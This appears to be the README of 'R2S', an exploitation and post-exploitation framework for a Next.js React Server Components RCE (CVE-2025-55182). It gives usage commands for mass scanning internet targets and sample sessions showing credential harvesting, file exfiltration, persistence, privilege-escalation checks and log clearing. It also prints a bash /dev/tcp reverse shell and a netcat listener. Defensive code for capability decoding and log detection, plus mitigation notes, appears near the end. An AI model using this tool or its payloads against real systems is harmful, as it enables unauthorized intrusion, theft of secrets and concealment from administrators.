Advanced Post-Exploitation Framework for Next.js React Server Components RCE
Features • Installation • Usage • Commands • Examples
R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.
- ✅ Automated vulnerability scanning - Mass scan multiple targets
- ✅ Interactive RCE shell - Stateful command execution with directory navigation
- ✅ HTTP-based file transfer - Upload/download files without base64 limitations
- ✅ Reverse shell automation - Try 25+ different reverse shell payloads
- ✅ Advanced enumeration - System, network, container, and cloud metadata
- ✅ Privilege escalation - Automated privesc vector detection
- ✅ Credential harvesting - Extract passwords, keys, tokens, and secrets
- ✅ Persistence mechanisms - Maintain access across reboots
- ✅ Lateral movement - Discover and pivot to other hosts
- ✅ Container escape - Check for Docker/Kubernetes breakout vectors
- ✅ Data exfiltration - Extract sensitive files and configurations
- ✅ Stealth operations - Clear logs and hide tracks
- Mass scanning with multi-threading support
- Pipeline mode for integration with other tools
- Automatic vulnerability detection for Next.js RSC
- Stateful interactive shell with persistent working directory
- HTTP-based upload - Transfer files to target via wget/curl
- HTTP-based download - Exfiltrate files via POST requests
- No size limitations - Works with large files (unlike base64 methods)
- Automatic HTTP server - Starts/stops as needed
- System enumeration - OS, kernel, users, processes
- Network discovery - Interfaces, routes, ARP, DNS, listening ports
- Container detection - Docker, Kubernetes, LXC identification
- Cloud metadata - AWS, GCP, Azure credential extraction
- Process memory dumping - Extract secrets from running processes
- Interesting file discovery - SUID, writable dirs, backups, configs
- Environment variables (passwords, API keys, tokens)
- `.env` files and configuration files
- SSH private keys and authorized_keys
- Bash history with sensitive commands
- Database files (SQLite, MySQL dumps)
- Cloud credentials (AWS, Azure, GCP)
- Git credentials and NPM tokens
- Browser data (cookies, login data)
- Docker and Kubernetes secrets
- SUID/SGID binaries detection
- Sudo permissions enumeration
- Writable system files (/etc/passwd, /etc/shadow)
- Docker socket access checks
- Linux capabilities analysis
- Kernel exploit suggestions
- Cron job enumeration
- PATH hijacking opportunities
- Persistence mechanisms - Cron jobs, .bashrc, systemd services
- Advanced persistence - LD_PRELOAD, systemd timers
- Port scanning - Internal network reconnaissance
- Lateral movement - SSH key discovery, known_hosts analysis
- Container escape - Privileged container checks, capability analysis
- Data exfiltration - Automated sensitive data collection
- Reverse shell automation - 25+ payload types with auto-retry
- Log clearing - Bash history, auth logs, syslog
- Track covering - wtmp, lastlog cleanup
- Session management - Save and resume sessions
```bash
# Python 3.6 or higher
python3 --version

# Install dependencies
pip3 install requests urllib3

# Clone or download the tool
cd r2s-main

# Make executable (optional)
chmod +x r2s_enhanced.py

# Run the tool
python3 r2s_enhanced.py -h
```

```bash
python3 r2s_enhanced.py [OPTIONS]
```

| Option | Description | Default |
|---|---|---|
| `-u, --url` | Single target URL | - |
| `-l, --list` | File containing list of URLs | - |
| `-c, --cmd` | Initial command to execute | `id` |
| `-t, --threads` | Number of scanning threads | 30 |
| `-p, --proxy` | HTTP proxy (e.g., `http://127.0.0.1:8080`) | - |
| `-v, --verbose` | Enable verbose output | False |
| `--http-port` | HTTP server port for file transfer | 8000 |
```bash
# Single target
python3 r2s_enhanced.py -u http://target.com

# Target list, 50 scanning threads
python3 r2s_enhanced.py -l targets.txt -t 50

# Pipeline mode: targets read from stdin
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
```

Once you gain RCE access, you'll enter an interactive shell with these commands:

```
upload <local_file> <remote_path>    # Upload file to target
download <remote_file> <local_path>  # Download file from target
cd <directory>                       # Change working directory
pwd                                  # Print working directory
enum                                 # Complete system enumeration
privesc                              # Privilege escalation checks
harvest                              # Credential harvesting
portscan <ip>                        # Scan internal network ports
memdump [pid]                        # Dump process memory for secrets
lateral                              # Lateral movement opportunities
escape                               # Container escape vectors
exfil [type]                         # Exfiltrate data (env/config/keys/db/logs/all)
reverse <lhost> <lport>              # Try multiple reverse shell payloads
persist                              # Add basic persistence
advpersist                           # Add advanced persistence
stealth                              # Clear logs and hide tracks
save                                 # Save current session
help, ?                              # Show help message
exit, quit                           # Exit interactive shell
```

Execute any shell command directly:
```
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
```

Scanning a single target and entering the shell:

```
$ python3 r2s_enhanced.py -u http://vulnerable-app.com
_ __ __ ____
/ | / /__ _ __/ /_/ __ \________
/ |/ / _ \| |/_/ __/ /_/ / ___/ _ \
/ /| / __/> </_ _/ _, _/ /__/ __/
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/
Next.js RSC Exploit Tool (CVE-2025-55182)
Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
>> CREDIT( G4rxd )

[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id
[VULN] http://vulnerable-app.com >>> RCE SUCCESS
    Output: uid=1000(node) gid=1000(node) groups=1000(node)
[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse
[+] HTTP server started on 192.168.1.100:8000
next-rce:/app$
```

System enumeration:

```
next-rce:/app$ enum
[*] Starting automated enumeration...
============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
============================================================
[*] Current User
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
============================================================
[*] Container Detection
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Docker container detected]
...
```

File transfer over the built-in HTTP server:

```
# Upload a file
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
[+] Upload successful!
-rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh

# Download a file
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] Downloading /etc/passwd via HTTP...
[+] Download successful! (1523 bytes)
Saved to: ./passwd.txt
```

Credential harvesting:

```
next-rce:/app$ harvest
[*] Harvesting credentials...
[*] Environment Variables:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[*] .env Files:
/app/.env
/app/.env.production
/var/www/.env.local
[*] SSH Keys:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa
...
```

Reverse shell automation:

```
next-rce:/app$ reverse 192.168.1.100 4444
[*] Starting reverse shell attempts to 192.168.1.100:4444
[!] Make sure you have a listener running: nc -lvnp 4444
[*] Trying 25 different reverse shell payloads...
[1/25] Trying Bash TCP... ✓ Executed
[?] Did you receive a connection? (y/n/s to stop): y
[+] SUCCESS! Reverse shell established using: Bash TCP
[*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
```

Mass scanning from a target list:

```
$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com

$ python3 r2s_enhanced.py -l targets.txt -t 50
[*] Loaded 3 targets. Starting scan with 50 threads...
[VULN] http://app1.example.com >>> RCE SUCCESS
[VULN] http://app3.example.com >>> RCE SUCCESS
[*] Scan completed.
```

Privilege escalation checks:

```
next-rce:/app$ privesc
[*] Checking privilege escalation vectors...
[*] SUID Binaries:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
[*] Sudo Permissions:
User node may run the following commands:
    (ALL : ALL) NOPASSWD: /usr/bin/docker
[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
[*] Docker Group:
In docker group - EXPLOITABLE!
...
```

Container escape checks:

```
next-rce:/app$ escape
[*] Checking container escape vectors...
[*] Container Type:
12:devices:/docker/a1b2c3d4e5f6
[*] Privileged Container:
PRIVILEGED
[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
[*] Capabilities:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[Full capabilities - container is privileged]
...
```

The tool includes 25+ reverse shell payloads across multiple languages and techniques:
- Bash (TCP, UDP, exec variants)
- Netcat (traditional, mkfifo, OpenBSD)
- Python/Python3 (socket, pty)
- Perl (multiple variants)
- PHP (exec, system, passthru)
- Ruby (socket variants)
- Node.js (child_process, socket)
- Socat, Telnet, AWK
- Golang, OpenSSL
Automatically detects and extracts credentials from:
- AWS - IAM roles, security credentials
- GCP - Service account tokens
- Azure - Instance metadata
- Environment variables with cloud credentials
Identifies and analyzes:
- Docker containers
- Kubernetes pods
- LXC containers
- Privileged vs unprivileged
- Available escape vectors
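The privileged/unprivileged decision in the `escape` output above rests on the `CapEff` mask and the cgroup path. The following is an added example of how to decode those two indicators; it is not R2S code. It assumes the standard Linux capability numbering, Docker's default capability mask `00000000a80425fb` for an unprivileged container, and a heuristic (an assumption) that a container holding every escape-relevant capability was started with `--privileged` or an equivalent `--cap-add`. The `/proc` text is constructed from the session shown above; on a target you would read `/proc/self/status` and `/proc/self/cgroup` instead.

```python
"""Decode the container indicators that `escape` prints (added example, not R2S code).

Inputs are constructed strings in the format of /proc/<pid>/status and
/proc/<pid>/cgroup; on a target, read those files instead.
"""
import re

# Linux capability numbers from include/uapi/linux/capability.h; list index == bit.
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]
# Capabilities that each give a known route to the host (mount, module load,
# ptrace of host processes, reading host files, raw devices, network namespace).
ESCAPE_CAPS = {"sys_admin", "sys_module", "sys_ptrace", "dac_read_search",
               "sys_rawio", "net_admin"}
# Docker's default capability set for an unprivileged container.
DOCKER_DEFAULT_MASK = "00000000a80425fb"


def decode_caps(mask_hex):
    """Names of the capabilities set in a hex CapEff/CapPrm/CapBnd value."""
    mask = int(mask_hex, 16)
    return {name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1}


def parse_cap_eff(status_text):
    """Extract the CapEff mask from /proc/<pid>/status text."""
    match = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if match is None:
        raise ValueError("no CapEff line in status text")
    return match.group(1)


def detect_runtime(cgroup_text):
    """Best-effort runtime detection from /proc/<pid>/cgroup lines.

    Works for cgroup v1 and for v2 when the path is exposed; a v2 line of
    plain "0::/" carries no information and yields "none".
    """
    for line in cgroup_text.splitlines():
        path = line.split(":", 2)[-1]
        if "/docker/" in path or "/docker-" in path:
            return "docker"
        if "kubepods" in path:
            return "kubernetes"
        if "/lxc/" in path or "lxc.payload" in path:
            return "lxc"
    return "none"


def assess(status_text, cgroup_text):
    """Summarise runtime, capability count and escape-relevant capabilities."""
    caps = decode_caps(parse_cap_eff(status_text))
    return {
        "runtime": detect_runtime(cgroup_text),
        "cap_count": len(caps),
        "extra_caps": sorted(caps - decode_caps(DOCKER_DEFAULT_MASK)),
        "escape_caps": sorted(caps & ESCAPE_CAPS),
        # Heuristic (assumption): every escape-relevant capability present means
        # the container was started with --privileged or an equivalent cap-add.
        "privileged": ESCAPE_CAPS <= caps,
    }


# Constructed samples matching the `escape` output shown earlier on this page.
STATUS_PRIVILEGED = "Name:\tnode\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n"
STATUS_DEFAULT = "Name:\tnode\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"
CGROUP_DOCKER = "12:devices:/docker/a1b2c3d4e5f6\n11:cpuset:/docker/a1b2c3d4e5f6\n"

if __name__ == "__main__":
    for label, status in (("privileged", STATUS_PRIVILEGED), ("default", STATUS_DEFAULT)):
        print(label, assess(status, CGROUP_DOCKER))
```

Comparing against Docker's default mask is what makes the check useful: a container that is not fully privileged but was given `--cap-add SYS_ADMIN` or `SYS_PTRACE` shows up in `extra_caps` and `escape_caps` even though the mask is far from `3fffffffff`.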
FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY

This tool is provided for educational purposes and authorized penetration testing only. Usage of this tool for attacking targets without prior mutual consent is illegal. The author is not responsible for any misuse or damage caused by this tool.

Requirements for legal use:
- ✅ Written authorization from the target owner
- ✅ Defined scope and rules of engagement
- ✅ Professional penetration testing engagement
- ❌ Unauthorized access to systems
- ❌ Malicious intent or damage
Detection:
- Monitor for unusual `Next-Action` headers
- Look for multipart/form-data POST requests to non-existent endpoints
- Check for base64-encoded command output in error responses
- Monitor for `child_process.execSync` in Next.js logs
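The first three detection bullets can be turned into a log heuristic. The following is an added example and not part of R2S; it assumes a JSON-lines request log whose records carry `method`, `path`, `status`, `content_type`, `headers` and `body_snippet` (a real deployment has to produce those from its reverse proxy or Next.js middleware, and the third rule needs response-body logging), a route allow-list `KNOWN_ROUTES`, and the assumption that legitimate Next.js server-action IDs are long hex digests. The sample log lines are constructed.

```python
"""Detection heuristics for the indicators listed above (added example, not R2S code).

Assumed input: a JSON-lines request log where each record has method, path,
status, content_type, headers and body_snippet. The sample log is constructed.
"""
import base64
import json
import re

# Assumption: legitimate Next.js server-action IDs are long hex digests; any
# other Next-Action value is "unusual" in the sense of the Detection list.
_ACTION_ID = re.compile(r"^[0-9a-f]{32,}$")
# A run of base64 long enough to carry a line of command output.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Substrings typical of shell output, unlikely in a legitimate RSC error digest.
_SHELL_MARKERS = ("uid=", "root:x:", "/bin/", "Linux ")

# Assumption: the application's real routes. A deployment would load these from
# its build manifest; a multipart POST to any other path is suspicious.
KNOWN_ROUTES = {"/", "/dashboard", "/api/login"}


def _decoded_shell_output(snippet):
    """Return decoded text if snippet contains base64 that decodes to shell output."""
    for match in _B64_RUN.finditer(snippet):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        printable = all(ch.isprintable() or ch in "\n\t" for ch in text)
        if printable and any(marker in text for marker in _SHELL_MARKERS):
            return text
    return None


def analyze(record):
    """Return the detection reasons that fire for one request record."""
    reasons = []
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    action = headers.get("next-action")
    if action is not None and not _ACTION_ID.match(action):
        reasons.append("unusual Next-Action header value: %r" % action)

    content_type = record.get("content_type", "").lower()
    if record.get("method") == "POST" and content_type.startswith("multipart/form-data"):
        if record.get("status") == 404 or record.get("path") not in KNOWN_ROUTES:
            reasons.append("multipart POST to non-existent endpoint %s" % record.get("path"))

    if record.get("status", 0) >= 500:
        decoded = _decoded_shell_output(record.get("body_snippet", ""))
        if decoded is not None:
            reasons.append("base64 shell output in error response: %r" % decoded[:40])
    return reasons


def scan_log(jsonl_text):
    """Scan a JSON-lines log; return [(line_number, reasons)] for flagged requests."""
    hits = []
    for number, line in enumerate(jsonl_text.strip().splitlines(), start=1):
        reasons = analyze(json.loads(line))
        if reasons:
            hits.append((number, reasons))
    return hits


def _record(method, path, status, content_type="", headers=None, body=""):
    return json.dumps({"method": method, "path": path, "status": status,
                       "content_type": content_type, "headers": headers or {},
                       "body_snippet": body})


# Constructed sample: a page load, a legitimate server action, an exploit-style
# request whose error digest carries base64 `id` output, and a probe of a
# route that does not exist.
_FAKE_ID_OUTPUT = base64.b64encode(b"uid=1000(node) gid=1000(node)").decode()
SAMPLE_LOG = "\n".join([
    _record("GET", "/", 200),
    _record("POST", "/dashboard", 200, "multipart/form-data; boundary=----a",
            {"Next-Action": "7f3a9c2e1d4b5a6f8e9c0d1b2a3f4e5d6c7b8a9f"}),
    _record("POST", "/", 500, "multipart/form-data; boundary=----b",
            {"Next-Action": "x"}, '{"digest":"%s"}' % _FAKE_ID_OUTPUT),
    _record("POST", "/does-not-exist", 404, "multipart/form-data; boundary=----c",
            {"Next-Action": "9f3a"}),
])

if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print("line %d:" % number)
        for reason in reasons:
            print("  -", reason)
```

Each rule is weak on its own (a developer typo can produce a multipart POST to a 404, and a malformed action ID can come from a stale client bundle), so alert on the combination or on repeated hits from one source rather than on any single reason.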
Mitigation:
- Update Next.js to the latest patched version
- Implement Web Application Firewall (WAF) rules
- Restrict server-side code execution
- Monitor and log all RSC requests
- Implement proper input validation
- ✅ Added reverse shell automation (25+ payloads)
- ✅ Added memory dumping capabilities
- ✅ Added lateral movement discovery
- ✅ Added container escape checks
- ✅ Added data exfiltration automation
- ✅ Added advanced persistence mechanisms
- ✅ Improved HTTP file transfer
- ✅ Enhanced enumeration features
- ✅ Better error handling and UX
- ✅ HTTP-based file transfer
- ✅ Persistence mechanisms
- ✅ Port scanner
- ✅ Privilege escalation checks
- ✅ Network enumeration
- ✅ Credential harvesting
- ✅ Session management
- ✅ Automated enumeration
- ✅ Stealth features
- Stateful shell with directory navigation
- Basic file transfer (base64)
- Improved error handling
Contributions are welcome! Please ensure all contributions are for educational and defensive security purposes.
G4rxd
- CVE-2025-55182 Discovery Team
- Next.js Security Research Community
- Open Source Security Tools Community
This project is licensed for educational and authorized testing purposes only.
⚡ Happy Ethical Hacking! ⚡
Remember: With great power comes great responsibility.